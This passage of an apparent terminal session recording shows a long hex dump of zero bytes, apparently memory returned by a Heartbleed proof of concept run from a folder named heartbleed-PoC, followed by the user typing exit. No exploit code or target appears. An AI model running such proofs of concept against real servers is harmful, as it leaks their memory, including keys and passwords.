................\r\n  3770: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  3780: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  3790: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  37a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  37b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  37c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  37d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  37e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  37f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  3800: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  3810: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  3820: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  3830: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  3840: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  3850: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  3860: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  3870: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  3880: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  3890: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  38a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  38b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  38c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  38d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ..."]
[49.435904, "o", ".............\r\n  38e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  38f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  3900: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  3910: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  3920: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  3930: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  3940: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  3950: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  3960: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  3970: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  3980: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  3990: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  39a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  39b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  39c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  39d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  39e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  39f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  3a00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  3a10: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  3a20: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  3a30: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  3a40: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  3a50: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  3a60: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  3a70: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  3a80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  3a90: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  3aa0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  3ab0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  3ac0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  3ad0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  3ae0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  3af0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  3b00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  3b10: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  3b20: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  3b30: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  3b40: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  3b50: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  3b60: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  3b70: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  3b80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  3b90: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  3ba0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  3bb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  3bc0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  3bd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  3be0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  3bf0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  3c00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  3c10: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  3c20: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  3c30: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  3c40: 00 00 00 00 00 00 00 0"]
[49.436153, "o", "0 00 00 00 00 00 00 00 00  ................\r\n  3c50: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  3c60: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  3c70: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  3c80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  3c90: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  3ca0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  3cb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  3cc0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  3cd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  3ce0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  3cf0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  3d00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  3d10: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  3d20: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  3d30: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  3d40: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  3d50: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  3d60: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  3d70: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  3d80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  3d90: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  3da0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  3db0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  3dc0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  3dd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  3de0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  3df0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  3e00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  3e10: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  3e20: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  3e30: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  3e40: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  3e50: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  3e60: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  3e70: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  3e80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  3e90: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  3ea0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  3eb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  3ec0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  3ed0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  3ee0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  3ef0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  3f00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  3f10: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  3f20: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  3f30: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  3f40: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  3f50: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  3f60: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  3f70: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  3f80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  3f90: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  3fa0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n"]
[49.436344, "o", "  3fb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  3fc0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  3fd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  3fe0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  3ff0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n\r\n\r\n\u001b[?2004h\u001b]0;nick@NickRamos: ~/Downloads/heartbleed-PoC\u0007\u001b[;32m┌──(\u001b[1;34mnick㉿NickRamos\u001b[;32m)-[\u001b[0;1m~/Downloads/heartbleed-PoC\u001b[;32m]\r\r\n\u001b[;32m└─\u001b[1;34m$\u001b[0m \r\u001b[;32m└─\u001b[1;34m$\u001b[0m "]
[55.374016, "o", "e\r\u001b[;32m└─\u001b[1;34m$\u001b[0m \u001b[C"]
[55.560593, "o", "x\r\u001b[;32m└─\u001b[1;34m$\u001b[0m \u001b[C\u001b[C"]
[55.671515, "o", "i"]
[55.793254, "o", "t"]
[56.44727, "o", "\r\n\u001b[?2004l\rexit\r\n"]
